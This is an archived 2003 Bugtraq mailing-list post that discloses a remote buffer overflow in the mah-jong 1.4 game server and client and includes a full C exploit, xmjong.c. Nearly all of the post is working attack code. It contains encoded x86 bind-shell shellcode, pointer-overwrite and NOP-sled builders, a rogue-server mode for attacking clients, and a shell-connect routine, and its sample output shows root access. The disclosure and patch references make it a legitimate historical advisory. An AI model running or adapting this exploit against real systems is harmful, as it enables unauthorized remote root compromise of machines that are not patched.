[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20031022093647.18464.qmail@sf-www3-symnsj.securityfocus.com>
Date: 22 Oct 2003 09:36:47 -0000
From: Vade 79 <v9@...ehalo.deadpig.org>
To: bugtraq@...urityfocus.com
Subject: mah-jong[v1.4]: server/client remote buffer overflow exploit.
did an audit of mah-jong after seeing something about a debian advisory...the bug(s) found weren't mentioned, but were fixed in the overall (giant) patch for mah-jong, which is provided on debian's website(1.4-2 patch). anyways, here is an exploit for the bug(s) found.
original reference:
http://fakehalo.deadpig.org/xmjong.c
------------------------ exploit: xmjong.c. ------------------------
/*[ mah-jong[v1.4]: server/client remote buffer overflow exploit. ]*
* *
* by: vade79/v9 v9@...ehalo.deadpig.org (fakehalo/realhalo) *
* *
* compile: *
* cc xmjong.c -o xmjong *
* *
* syntax: *
* ./xmjong <host|-b> [port] [return address] [offset] *
* *
* this program exploits the "SetPlayerOption" command of *
* mah-jong's server(mj-server) and the "PlayerOptionSet" command *
* of mah-jong's client(mj-player). while this is an undiscovered *
* bug, the giant all-purpose patch on debian's package site *
* appears to have resolved the issue. as such, this exploit *
* is applied to CAN-2003-0705. *
* *
* the overflow itself occurs do to an unchecked sscanf() call to *
* write to little_buffer[32]. the situation is rather odd do to *
* the repetitive nature of dec_pmsg.c/dec_cmsg.c using sscanf() *
* to write to little_buffer[32] properly, with limitation *
* restrictions, the other 13 times. the "SetPlayerOption" and *
* "PlayerOptionSet" command apparently slipped by. *
* *
* the original plan to exploit this bug was by placing the *
* shellcode after the overflow itself, in the same *
* little_buffer[32](shellcode on the stack) location. however, *
* there happens to not be very much on the stack, so you start *
* running into environmental variables quickly. this is too *
* dependent on the environment size, and will often run out of *
* bounds on small environments(ie. 0xc0000000 on linux). *
* *
* so, instead the shellcode is being placed on the heap in the *
* "buffer.1" buffer. this can be found by running "objdump -x *
* mj-?????? | grep buffer.1", where "??????" is "server" or *
* "player", depending on what program is being exploited. once *
* the "buffer.1" address is found add 512 to it, this is to skip *
* the initial (re-used) junk at the beginning of the buffer. *
* *
* bug location: *
* (server-side; dec_pmsg.c) *
* 316:if ( strcmp(type,"SetPlayerOption") == 0 ) { *
* ... *
* 324:if ( sscanf(s,"%s %n",little_string,&n) ==0 ) { warn("pr$ *
* (client-side; dec_cmsg.c) *
* 876:if ( strcmp(type,"PlayerOptionSet") == 0 ) { *
* ... *
* 884:if ( sscanf(s,"%s %n",little_string,&n) ==0 ) { warn("pr$ *
* *
* fix: *
* 1.4-2 patch, which can be found on debian's package site. *
* *
* exploit workings(commands sent to the server): *
* (server-side) *
* Connect 1034 0 <shellcode, under 1024 bytes> *
* SetPlayerOption <pointer overwrite, >32 byte overflow> *
* (client-side) *
* <shellcode, under 1024 bytes> *
* PlayerOptionSet <pointer overwrite, >32 byte overflow> *
* *
* example usages: *
* (server-side example usage) *
* # cc xmjong.c -o xmjong *
* # ./xmjong localhost 5000 `objdump -x mj-server|\ *
* > grep buffer.1|awk '{print $1}'` 512 *
* [*] mah-jong[v1.4]: server/client remote buffer overflow exp$ *
* [*] by: vade79/v9 v9@...ehalo.deadpig.org (fakehalo) *
* *
* [*] target: localhost:5000, return address(buffer.1+512): 0x$ *
* *
* [*] attempting to connect: localhost:5000. *
* [*] successfully connected: localhost:5000. *
* [*] sending the strings to exploit the overflow. *
* -> Connect 1034 0 ??????????????????????????????????????????$ *
* -> SetPlayerOption ?????????????????????????????????????????$ *
* [*] checking to see if the exploit was successful. *
* [*] attempting to connect: localhost:45295. *
* [*] successfully connected: localhost:45295. *
* *
* Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 ED$ *
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sy$ *
* *
* (client-side example usage) *
* # cc xmjong.c -o xmjong *
* # ./xmjong -b 5000 `objdump -x mj-player|grep buffer.1|\ *
* > awk '{print $1}'` 512 *
* [*] mah-jong[v1.4]: server/client remote buffer overflow exp$ *
* [*] by: vade79/v9 v9@...ehalo.deadpig.org (fakehalo) *
* *
* [*] target: *:5000, return address(buffer.1+512): 0x080733a0. *
* *
* [*] awaiting connection from: *:5000. *
* [*] mah-jong server connection established. *
* [*] sending the strings to exploit the overflow. *
* -> ?????????????????????????????????????????????????????????$ *
* -> PlayerOptionSet ?3???3???3???3???3???3???3???3???3???3???$ *
* [*] mah-jong server connection closed. *
* [*] checking to see if the exploit was successful. *
* [*] attempting to connect: 127.0.0.1:45295. *
* [*] successfully connected: 127.0.0.1:45295. *
* *
* Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 ED$ *
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sy$ *
* *
* note: *
* this isn't a completely standard stack overflow; however *
* exploitation looks very similar. as such, standard stack *
* overflow knowledge is all that is needed to understand this. *
* *
* (tested on redhat/7.1, squished exploit code as always, also a *
* little loose on the comments this time around) .,,. *
************************* ..,,,.. . . .. . .. (v9fh) ..... */
#include <stdio.h> /* ;~~ .,;:iil8OO8li:;,,. `~~' ~: */
#include <stdlib.h> /* : .i48$$$$$$88O88$$$$$88L. . . */
#include <stdarg.h> /* . (8$$$P"^`...,.``~;88$$$$8) :$: */
#include <string.h> /* . `l$$bo.``' `18$$87 . ` . */
#include <strings.h> /* . . `t$$8Oo4Oo. i.. ``., i ..;. */
#include <signal.h> /* . ) ,$87~8O7~ . lii: .:: l ' */
#include <unistd.h> /* i .' .487'__- 4$l; :ii I _---~ */
#include <ctype.h> /* l ` .o$87 ..ake .4$$7., ill I ..alo . */
#include <netdb.h> /* I .oO$87'.. .4$$$7':illII $ . */
#include <sys/socket.h> /* $.`q87' `` .,o4$$$$87 . lI$ $ . */
#include <sys/types.h> /* $Oo.~' `~t88P~` i I$$ $ . */
#include <sys/time.h> /* `~' _ _ l $$$ $.... ..: */
#include <netinet/in.h> /* !filler FakeHalo ascii! ~ ``' ~~~~~~~~~ */
#include <arpa/inet.h> /*******************************************/
#define DFLADDR (0x0807f7a0+512) /* objdump -x mj-?????? | grep buffer.1 */
#define DFLPORT 5000 /* default port mah-jong server runs on. */
#define DFLCLMN 80 /* default column value, if no $COLUMNS is defined. */
#define TIMEOUT 10 /* generic alarm() timeout, simple style. */
static char x86_exec[]= /* bindshell(45295)&, netric/S-poly. */
"\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49\x41\x49\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0\x06\x9e\x26\x86\xdb\x26"
"\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95"
"\x06\xb0\x25\x25\x25\x3b\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28"
"\x88\xd7\x27\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
"\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b\xa2\x55\x5e"
"\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85\x05\xa2\x55\x06\x95\x06"
"\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0"
"\x85\xd7\xa2\x55\x0e\x98\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95"
"\x06\x9e\x5e\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
"\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37\x3e\x43\x5e"
"\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2\x55\x06\x95\x15\xa2\x55"
"\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0\x6e";
char *getptr(unsigned int);
char *getcode(void);
char *mj_bind(unsigned short,unsigned int);
unsigned short mj_connect(char *,unsigned short,unsigned int);
void getshell(char *,unsigned short);
void filter_text(char *);
void mj_printf(int,char *,...);
void printe(char *,short);
void sig_alarm(){printe("alarm/timeout hit.",1);}
int main(int argc,char **argv){
unsigned short isbind=0,port=DFLPORT;
unsigned int ptr=DFLADDR;
char *hostptr;
printf("[*] mah-jong[v1.4]: server/client remote buffer overflow ex"
"ploit.\n[*] by: vade79/v9 v9@...ehalo.deadpig.org (fakehalo)\n\n");
if(argc<2){
printf("[!] syntax: %s <host|-b> [port] [return address] [offset]\n",
argv[0]);
exit(1);
}
if(!strcmp(argv[1],"-b"))isbind=1;
if(argc>2)port=atoi(argv[2]);
if(argc>3)sscanf(argv[3],"%x",&ptr);
if(argc>4)ptr+=atoi(argv[4]);
printf("[*] target: %s:%u, return address(buffer.1+512): 0x%.8x.\n\n",
isbind?"*":argv[1],port,ptr);
if(isbind)hostptr=mj_bind(port,ptr);
else mj_connect((hostptr=argv[1]),port,ptr);
sleep(1);
getshell(hostptr,45295); /* defined in shellcode. */
exit(0);
}
char *getptr(unsigned int newptr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(128+1)))
printe("getptr(): allocating memory failed.",1);
memset(buf,0x0,128+1);
for(i=0;i<128;i+=4){*(long *)&buf[i]=newptr;}
return(buf);
}
char *getcode(void){
char *buf;
if(!(buf=(char *)malloc(1000+1)))
printe("getcode(): allocating memory failed",1);
memset(buf,0x90,(1000-strlen(x86_exec)));
memcpy(buf+(1000-strlen(x86_exec)),x86_exec,strlen(x86_exec));
return(buf);
}
char *mj_bind(unsigned short port,unsigned int newptr){
int ssock=0,sock=0,so=1;
unsigned int salen=0;
struct sockaddr_in ssa,sa;
ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
ssa.sin_family=AF_INET;
ssa.sin_port=htons(port);
ssa.sin_addr.s_addr=INADDR_ANY;
printf("[*] awaiting connection from: *:%d.\n",port);
if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
printe("could not bind socket.",1);
listen(ssock,1);
bzero((char*)&sa,sizeof(struct sockaddr_in));
salen=sizeof(sa);
sock=accept(ssock,(struct sockaddr *)&sa,&salen);
close(ssock);
printf("[*] mah-jong server connection established.\n");
printf("[*] sending the strings to exploit the overflow.\n");
mj_printf(sock,"%s\n",getcode());
mj_printf(sock,"PlayerOptionSet %s\n",getptr(newptr));
sleep(1);
close(sock);
printf("[*] mah-jong server connection closed.\n");
return(inet_ntoa(sa.sin_addr));
}
unsigned short mj_connect(char *hostname,unsigned short port,
unsigned int newptr){
int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("mah-jong connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.\n",hostname,port);
printf("[*] sending the strings to exploit the overflow.\n");
mj_printf(sock,"Connect 1034 0 %s\n",getcode());
mj_printf(sock,"SetPlayerOption %s\n",getptr(newptr));
sleep(1);
close(sock);
return(0);
}
void getshell(char *hostname,unsigned short port){
int sock,r;
fd_set fds;
char buf[4096+1];
struct hostent *he;
struct sockaddr_in sa;
printf("[*] checking to see if the exploit was successful.\n");
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
return;
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
void filter_text(char *ptr){
unsigned int i=0,columns=DFLCLMN;
if(getenv("COLUMNS"))columns=atoi(getenv("COLUMNS"));
if(7>columns||columns>256)columns=DFLCLMN;
for(i=0;i<strlen(ptr);i++){
if(i>=(columns-3)){
ptr[i--]=0x0;
ptr[i--]='.';
ptr[i--]='.';
ptr[i]='.';
}
else if(ptr[i]=='\r'||ptr[i]=='\n')ptr[i]=0x0;
else if(!isprint(ptr[i]))ptr[i]='?';
}
return;
}
void mj_printf(int sock,char *fmt,...){
char *buf;
va_list ap;
if(!(buf=(char *)malloc(1024+1)))
printe("mj_printf(): allocating memory failed.",1);
memset(buf,0x0,1024+1);
va_start(ap,fmt);
vsnprintf(buf,1024,fmt,ap);
va_end(ap);
write(sock,buf,strlen(buf));
filter_text(buf);
printf("-> %s\n",buf);
free(buf);
return;
}
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
Powered by blists - more mailing lists